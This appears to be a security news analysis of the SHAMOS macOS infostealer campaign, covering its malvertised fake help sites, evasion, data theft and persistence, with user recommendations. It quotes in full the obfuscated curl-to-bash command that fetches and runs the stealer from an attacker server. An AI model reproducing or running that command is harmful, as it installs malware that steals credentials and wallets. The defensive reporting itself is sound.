Between June and August 2025, a sophisticated malware campaign has been actively targeting macOS users, compromising over 300 customer environments through deceptive help websites. This operation introduces SHAMOS, a variant of the notorious Atomic macOS Stealer (AMOS), developed by the cybercriminal group COOKIE SPIDER. This group operates this information stealer as malware-as-a-service, renting it out to other cybercriminals.
Attack Vector: Deceptive Help Websites
The attack initiates when users search for common macOS troubleshooting solutions, such as macOS flush resolver cache, and encounter promoted malvertising websites in their search results. These fraudulent sites, including mac-safer.com and rescue-mac.com, masquerade as legitimate technical support resources while harboring malicious intent. The campaign has targeted users across multiple countries, including the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy, notably excluding Russia due to restrictions within Russian eCrime forums that prohibit targeting Commonwealth of Independent States regions.
Infection Mechanism and Technical Implementation
The malware’s infection mechanism relies on a cleverly disguised terminal command that victims unknowingly execute:
“`bash
curl -fsSL $ (echo aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo | base64 -d) | bash
“`
This command performs several critical operations in sequence. First, it decodes the Base64-encoded string to reveal the URL https://icloudservers.com/gm/install[.]sh, then downloads and executes a Bash script from this malicious server. The script captures the user’s password and subsequently downloads the SHAMOS Mach-O executable from https://icloudservers.com/gm/update.
Once installed in the /tmp/ directory, SHAMOS employs multiple evasion techniques to avoid detection. The malware removes extended file attributes using xattr commands to bypass macOS Gatekeeper security checks, assigns executable permissions through chmod, and conducts anti-virtual machine checks to ensure it is not operating within a security sandbox environment. The stealer then executes various AppleScript commands for comprehensive host reconnaissance and data collection.
SHAMOS specifically targets cryptocurrency wallet files, sensitive credential databases, Keychain data, AppleNotes content, and browser-stored information. The malware packages stolen data into a ZIP archive named out.zip and exfiltrates it using curl commands to remote servers. Additionally, SHAMOS establishes persistence through a Plist file named com[.]finder[.]helper[.]plist saved to the User’s LaunchDaemons directory when sudo privileges are available.
Broader Context: Evolution of macOS Malware
The emergence of SHAMOS underscores a broader trend in the evolution of macOS malware. Historically, macOS was considered relatively secure compared to other operating systems. However, the increasing popularity of Apple devices has made them attractive targets for cybercriminals.
One notable predecessor to SHAMOS is the Shlayer Trojan, first identified in 2018. Shlayer was distributed through fake Adobe Flash Player updates and was capable of bypassing macOS security measures. It primarily served as a dropper for adware and other unwanted applications. By 2019, Shlayer had become the most widespread macOS threat, accounting for nearly 30% of all attacks on the platform.
The tactics employed by SHAMOS, such as using deceptive help websites and sophisticated social engineering, represent an evolution from earlier methods. These strategies exploit users’ trust in legitimate-looking resources and their willingness to follow technical instructions to resolve issues.
Implications for macOS Users
The SHAMOS campaign highlights several critical implications for macOS users:
1. Increased Sophistication of Attacks: Cybercriminals are employing more advanced techniques, including social engineering and obfuscation, to bypass security measures and deceive users.
2. Targeting of Sensitive Information: The focus on stealing credentials, cryptocurrency wallets, and other sensitive data indicates a shift towards more financially motivated attacks.
3. Global Reach: The widespread targeting across multiple countries demonstrates the global nature of the threat and the need for international cooperation in cybersecurity efforts.
Recommendations for macOS Users
To mitigate the risk posed by SHAMOS and similar malware, macOS users should adopt the following practices:
1. Exercise Caution with Online Resources: Be wary of websites offering technical support or software downloads, especially those encountered through search engine results.
2. Verify Commands Before Execution: Avoid executing terminal commands from unverified sources. Always cross-reference instructions with official documentation or trusted forums.
3. Keep Software Updated: Regularly update macOS and all installed applications to ensure the latest security patches are applied.
4. Use Reputable Security Software: Install and maintain reputable antivirus and anti-malware software to detect and prevent infections.
5. Educate Yourself on Phishing and Social Engineering: Stay informed about common phishing tactics and social engineering methods to recognize and avoid potential threats.
Conclusion
The SHAMOS malware campaign serves as a stark reminder of the evolving threats facing macOS users. By understanding the tactics employed by cybercriminals and adopting proactive security measures, users can better protect themselves against such sophisticated attacks.
